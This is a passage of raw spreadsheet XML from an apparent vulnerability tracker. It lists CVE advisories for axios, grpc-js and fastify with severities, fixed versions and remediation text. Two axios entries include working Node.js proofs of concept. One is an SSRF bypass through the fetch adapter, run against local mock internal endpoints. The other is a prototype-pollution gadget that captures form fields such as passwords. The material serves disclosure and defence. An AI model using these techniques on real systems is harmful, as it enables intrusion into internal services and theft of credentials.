console.log(`  redirects to ${internalCfg}`);
console.log('');
// CONTROL: HTTP adapter correctly enforces maxRedirects: 0
let httpBlocked = false;
try {
  await axios.get(targetUrl, { maxRedirects: 0, adapter: 'http' });
  console.log('[CONTROL]  HTTP adapter + maxRedirects:0  BUG: should have thrown');
} catch (err) {
  httpBlocked = true;
  console.log(`[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (${err.code ?? err.message})`);
}
console.log(`[CONTROL]  Internal hits after HTTP adapter: ${internalHits}`);
// BYPASS: Fetch adapter silently ignores maxRedirects: 0
let fetchResponse = null;
try {
  fetchResponse = await axios.get(targetUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗');
  console.log('           Response:', JSON.stringify(fetchResponse.data));
} catch (err) {
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  redirect blocked (unexpected):', err.message);
}
console.log(`[BYPASS]   Internal hits after fetch adapter: ${internalHits}`);
// BYPASS: Fetch adapter follows redirect to state-changing internal endpoint
let changedResponse = null;
try {
  changedResponse = await axios.get(changeUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter state change:', JSON.stringify(changedResponse.data));
  console.log(`[BYPASS]   Internal hits after state change: ${internalHits}`);
} catch (err) {
  console.log('[BYPASS]   State change request blocked (unexpected):', err.message);
}
console.log('');
if (httpBlocked &amp;&amp; fetchResponse &amp;&amp; changedResponse) {
  console.log('POC RESULT: fetch adapter followed redirects despite maxRedirects:0,');
  console.log('            reaching internal service and mutating internal state.');
} else if (httpBlocked &amp;&amp; fetchResponse) {
  console.log('POC RESULT: fetch adapter followed redirect despite maxRedirects:0,');
  console.log('            reaching internal service that should have been unreachable.');
} else if (!httpBlocked) {
  console.log('POC RESULT: HTTP adapter did not block redirect -- unexpected, check axios version.');
} else {
  console.log('POC RESULT: fetch adapter blocked redirect -- issue may be fixed.');
}
serverA.close();
serverB.close();
```
Run:
```bash
node poc-max-redirects.mjs
```
Observed:
```text
Axios maxRedirects bypass via fetch adapter PoC
axios VERSION=1.17.0
maxRedirects=0
Target URL=http://127.0.0.1:13801/api/data
  redirects to http://127.0.0.1:13802/internal/secrets
Change URL=http://127.0.0.1:13801/api/change-config
  redirects to http://127.0.0.1:13802/internal/admin/config
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗
           Response: {"secret":"FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY","role":"arn:aws:iam::000000000000:role/FakeProductionRole"}
[BYPASS]   Internal hits after fetch adapter: 1
[BYPASS]   Fetch adapter state change: {"reached":"state-changing internal admin endpoint","changed":true,"internalConfig":{"compromised":true,"source":"redirect-followed-by-fetch-adapter"}}
[BYPASS]   Internal hits after state change: 2
POC RESULT: fetch adapter followed redirects despite maxRedirects:0,
            reaching internal service and mutating internal state.
```
## Control
Axios does correctly enforce `maxRedirects: 0` in the HTTP adapter. The `[CONTROL]` case above confirms this: the same request with `adapter: 'http'` throws rather than following the redirect, and the internal hit counter stays at `0`:
```text
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
```
The issue is not that `maxRedirects` is broken globally. It is enforced correctly for the HTTP adapter. The bypass is specific to the fetch adapter, which never reads the option and passes no `redirect` constraint to the underlying `fetch()` call.
## Impact
This is a redirect enforcement bypass affecting axios applications running in environments where the fetch adapter is active.
The internal admin route in the PoC simulates an affected deployment where a redirected request can reach state-changing internal APIs. The vulnerability is that `maxRedirects: 0` is silently ignored by the fetch adapter; the exact impact depends on what redirect targets are reachable from the runtime.
The impact is environment- and configuration-dependent. It affects axios users who:
- Set `maxRedirects: 0` as a defense against redirect-based SSRF, and
- Run in an environment where the fetch adapter is selected, either by runtime (Deno, Bun, Cloudflare Workers) or by explicit configuration
In these cases, a `302` redirect from the initial target is followed silently by default, unless the caller separately sets `fetchOptions.redirect`. If the redirect target is an internal service, the application returns its response to the caller with no indication that a redirect occurred or that `maxRedirects` was not honoured. The failure is silent: no error is thrown, no warning is logged.
The bypass is not limited to read-only access. As demonstrated by the second bypass case, a redirect to a state-changing internal endpoint succeeds equally. An attacker who can influence the redirect destination, for example through an open redirect on the initial target or a server they control, can reach internal and trigger mutations that the application never intended to issue.
Potentially affected environments include:
- Deno and Bun applications using axios where the fetch adapter is the default.
- Cloudflare Workers using axios, which has no Node.js `http` module.
- Node.js applications that explicitly configure `adapter: 'fetch'` or a custom adapter list that resolves to fetch.
- Any application that conditionally sets `maxRedirects: 0` and runs across multiple environments with different adapter selection.
Internal services reachable via a redirect include cloud instance metadata endpoints (`169.254.169.254`), unauthenticated local services such as Redis or internal admin APIs, and other hosts accessible from the application's network that are not intended to be reachable by the caller. The hit counter in the PoC makes the access concrete: `0` after the HTTP control, `1` after the confidentiality bypass, `2` after the integrity bypass.
This should not be characterised as an unconditional SSRF. The bypass requires either an open redirect on the initial target, or a URL that is itself a redirect. The issue is that `maxRedirects: 0`, which is the intended mitigation for this class of attack, is silently non-functional in the fetch adapter, leaving applications with a false sense of protection.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D355" s="5" t="inlineStr"/>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M355" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr"/>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.
Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.
## Impact
The impact depends on which property is polluted and which axios serialization path the application uses.
Polluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.
## Affected Functionality
Affected:
- `axios.toFormData()`.
- `transformRequest` paths that serialize plain objects to `multipart/form-data`.
- URL-encoded form serialization paths that rely on the same helper.
- `formSerializer` option defaults when the relevant properties are absent as own properties.
Not affected:
- JSON request bodies.
- Requests that do not invoke `toFormData()`.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:
```js
{
  metaTokens: true,
  dots: false,
  indexes: false
}
```
That default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:
```js
const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;
```
These reads can resolve inherited polluted properties.
Local code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.maxDepth = 1;
await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});
```
Expected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.
For serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.
## Workarounds
Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._
_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._
### Details
#### Root Cause
_The attack chain has three steps:_
_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_
_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_
```js
const formSerializer = own(this, 'formSerializer');
```
_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_
```js
return toFormData(data, _FormData &amp;&amp; new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined
```
_**Step 2: `toFlatObject` returns a plain-object default**_
_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_
```js
options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);
```
_`toFlatObject` has an early-return for null/undefined sources:_
```js
// lib/utils.js:607
if (sourceObj == null) return destObj;
```
_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._
_**Step 3: Options are read without `hasOwnProp` guards**_
_The six option properties are read directly from the plain object:_
```js
const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;
```
_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._
#### Why the Existing Defenses Didn't Catch This
_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._
### PoC
#### Reproduction Steps
#### Environment
_Any environment with Node.js and npm. Tested on:_
_- Node.js v24.15.0, npm 11.13.0_
_- axios v1.18.1 (latest release at time of writing)_
##### Step 1: Create a fresh project
```bash
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
```
##### Step 2: Create the PoC file
_Create `poc.mjs` with the following content:_
```js
import axios from 'axios';
import http from 'http';
// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;
const server = http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('{}');
});
server.listen(0, '127.0.0.1', async () =&gt; {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });
        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]
        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
```
##### Step 3: Run the PoC
```bash
node poc.mjs
```
### Impact
#### 1. Data Exfiltration via `visitor` (Confidentiality: High)
_A polluted `Object.prototype.visitor` function is called as the form data visitor:_
```js
visitor.call(formData, el, key, path, exposedHelpers)
```
_The attacker receives:_
_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_
_- **`key`** — the field name_
_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_
_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_
_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._
#### 2. Denial of Service via `maxDepth` (Availability: Low)
_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._
#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)
_Polluting these options changes the serialization format of form field names:_
_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_
_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_
_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_
_The server may misinterpret the submitted form data, leading to silent data corruption._
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D356" s="5" t="inlineStr"/>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M356" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr"/>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>### Impact
When server credentials are created with the `requireClientCertificate` option set to `false`, `getAuthContext` does not distinguish between authorized and unauthorized certificates in its return value. This can create improper authentication vulnerabilities for `@grpc/grpc-js` users who use the result of `getAuthContext` for authentication.
In particular, `@grpc/grpc-js-xds` can both set the `requireClientCertificate` option to `false` and use the return value of `getAuthContext` for RBAC authentication in some configurations.
### Patches
This vulenrability is fixed in 1.13.6 and 1.14.5.
### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this problem by setting `requireClientCertificate` to `true`. `@grpc/grpc-js-xds` users using RBAC can avoid this by setting the `require_client_certificate` field to `true` in the DownstreamTlsContext in the xDS configuration.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="D357" s="5" t="inlineStr"/>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M357" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr"/>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify routes a malformed URL under one plugin prefix to the custom not-found handler of a different sibling plugin, invoking the handler registered last and skipping the `preHandler` declared in its `setNotFoundHandler()`. When the request method has no route in the main router, a malformed request target reaches Fastify's internal not-found router before URL decoding and is dispatched through a single shared handler pointer, regardless of prefix and without the normal request lifecycle. An unauthenticated request to a public prefix can therefore reach an authentication-protected not-found handler registered under a different prefix and receive its full response, breaking prefix encapsulation and bypassing the authentication hook. Applications whose private or tenant fallbacks return protected data from a not-found handler are affected.
### Patches
Patched in fastify 5.12.2. Malformed URLs are now routed through the configured `onBadUrl` and `onMaxParamLength` handlers so they fail closed before any application not-found handler runs, and the shared not-found handler pointer has been removed.
### Workarounds
Reject malformed request targets before they reach the application, for example at an upstream proxy or gateway, and do not rely on a not-found handler to serve protected data. A global `onRequest` authentication hook does not mitigate this, because the malformed-URL path skips it.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="D358" s="5" t="inlineStr"/>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M358" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr"/>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify lowercases header-schema property names before compiling the schema, because Node.js stores request header names in lowercase. That normalization was incomplete: it lowercased only top-level `properties` keys and the root `required` array, and did not lowercase the JSON Schema Draft 7 `dependencies` keyword (its trigger keys and dependent property names) or names in nested subschemas. As a result, a header schema that uses `dependencies` to require one header when another is present (for example `X-Admin` requiring `X-Admin-Token`) never matches the lowercased request headers, so the dependency assertion is silently skipped. An unauthenticated remote client can send the header that activates a privileged path while omitting the header the dependency was meant to require, bypassing a schema-enforced security control. The header schema is idiomatic, valid JSON Schema Draft 7, and no custom validator, malformed request, or misconfiguration is required.
### Patches
Header-schema names are now normalized across all schema positions (`properties`, `required`, `dependencies`, `dependentRequired`, `dependentSchemas`, and nested subschemas). Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release. Header schemas referenced through an external shared `$ref` (registered with `addSchema`) are not reached by this normalization and now emit an `FSTSEC002` startup warning; inline the header schema to keep case-insensitive assertions in effect.
### Workarounds
If upgrading is not immediately possible, write header-schema names in lowercase so the `dependencies` and other case-sensitive assertions match Node's lowercased request headers, or enforce the cross-header requirement in an `onRequest` or `preValidation` hook instead of the schema.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="D359" s="5" t="inlineStr"/>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M359" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr"/>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify decided whether to validate a request part by checking its schema for JavaScript truthiness. JSON Schema Draft 7 defines the boolean `false` as a valid schema that rejects every instance, but because `false` is falsy, a route that set `body`, `querystring`, `params`, or `headers` to `false` had that part left uncompiled: no validator was attached and the request reached the handler. An application that used `false` as a deny-all schema to make a route unreachable was therefore fully bypassed, and an unauthenticated remote client could reach the handler with any input. The same applied to the documented `query` alias for `querystring`. This is a complete bypass rather than a weak-schema issue, since `false` is the strongest JSON Schema assertion and must always fail.
### Patches
Request-part schemas are now selected by an explicit presence check rather than truthiness, so a boolean `false` (or `true`) schema is compiled and enforced, including through the `query` alias. Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release.
### Workarounds
If upgrading is not immediately possible, express a deny-all request schema with an always-failing object schema instead of the boolean `false` (for example `{ "not": {} }`), or reject the request in an `onRequest` hook.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="D360" s="5" t="inlineStr"/>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M360" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr"/>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify runs a route's validator and, for a result shaped like `{ value, error }`, unwraps it: an `error` becomes a validation failure and `value` replaces the request part. This convention is intended for synchronous custom compilers (for example Joi). A JSON Schema `$async` validator, however, resolves with the validated data itself, so Fastify applied the same unwrapping to it. If a request part validated by an `$async` schema contains a `value` property, Fastify replaced the whole request part with that nested value before the handler ran, so a `value` or `error` property in the payload was attacker-controlled. An application that dispatches operations from the validated request body could then act on data that never satisfied the route schema, leading to unauthorized state changes or disclosure. Reaching the vulnerable path requires the route to use an `$async` request schema.
### Patches
Fastify no longer treats an asynchronous validation result as a `{ value, error }` wrapper: an async validator's resolved value is used only to determine pass or fail, and it can no longer replace the request part or inject an error. The synchronous custom-compiler contract is unchanged. Patched in fastify `5.12.2` and `6.0.0`.
### Workarounds
If upgrading is not immediately possible, avoid `$async` request schemas, or perform the security-sensitive check in an `onRequest` or `preHandler` hook rather than relying on the schema-validated request part. Custom async validator compilers should signal failure by throwing (rejecting) rather than returning an `{ error }` object.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D361" s="5" t="inlineStr"/>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M361" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
